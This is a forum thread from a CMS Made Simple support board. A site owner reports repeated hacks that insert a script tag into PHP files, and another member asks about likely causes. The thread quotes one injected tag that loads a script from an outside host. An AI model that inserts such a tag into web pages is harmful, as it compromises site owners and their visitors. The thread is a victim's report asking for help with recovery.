Javasript Injection on various PHP pages

For questions and problems with the CMS core. This board is NOT for any 3rd party modules, addons, PHP scripts or anything NOT distributed with the CMS made simple package itself.
Post Reply
minneapolisite
Forum Members
Forum Members
Posts: 24
Joined: Sat Feb 23, 2008 1:15 pm

Javasript Injection on various PHP pages

Post by minneapolisite »

Over the past two weeks I have had several of my CMS MS sites hacked. Whatever it is, it's inserting a <__script__> tag at the head of my PHP files (for sure index.php, admin/login.php, and admin/index.php, possibly more that I haven't found yet).

The scripts always look like this, but with a different path every time.

Code: Select all

<__script__ type="text/javascript" src="http://dveri-plus.com.ua/facebook.php"></__script>
Googling the various paths has not helped me find a resolution yet.

For my own site (hosted on 1and1.com) I deleted my entire CMS MS install (including the old SQL database) and reinstalled the most recent version. I implemented most of the security suggestions in this sticky thread. (I do not have access/skills to make the Apache/PHP.ini modifications.)

For one of my client sites (hosted on justhost.com) I deleted my entire CMS MS install (but kept the old SQL database) and reinstalled the most recent version. I did not implement additional security measures (planned to do that today, but it was already hit overnight.)

The very next day the hack repeated itself. :(

I'm an HTML/CSS expert, but a SQL/PHP novice. Has anyone else seen this hack, or something like it? Any suggestions on how I can prevent it?

It's possible this isn't a CMS MS issue (it also happened to an instance of Expression Engine stored alongside CMS MS) but the only pattern I see so far is that it's happened on servers on which I have CMS MS installed (no other similarities between the sites/servers.)
Top
User avatar
M@rtijn
Power Poster
Power Poster
Posts: 706
Joined: Sat Nov 14, 2009 4:54 pm

Re: Javasript Injection on various PHP pages

Post by M@rtijn »

We have not seen this hack before, so I myself don't think it's related to CMSMS.

Did you change passwords and database connections between the first and second hack?
Is your computer spyware (keylogger) free?
Are there any other website's on the same host who are having the same problem?
Make your community a better place!
Top
minneapolisite
Forum Members
Forum Members
Posts: 24
Joined: Sat Feb 23, 2008 1:15 pm

Re: Javasript Injection on various PHP pages

Post by minneapolisite »

Thanks for the fast reply.

My computer possibly had keyloggers on it at one point, but it is clean now (I have recently run the latest version of Spybot S&D and Malwarebytes Anti-Malware, and run Symantec Anti-Virus at all times. I just re-ran Spybot this morning to double-check and it came up clean.)

On the client site, I reused the old database with the old password. (Whoops.)

On my own site I most definitely changed database connections/passwords, since I completely deleted the old database and created a new one with a new name, username, and password. I also definitely created this new database and new CMS MS install when my computer was keylogger free.

Something new in my life: I am running Apache and PHP on my PC and opened up port 81 to do so. However, I'm not sure how this would affect a site that I hadn't even visited in months, much less FTPed or logged in to. :/
Top
Post Reply

Return to “CMSMS Core”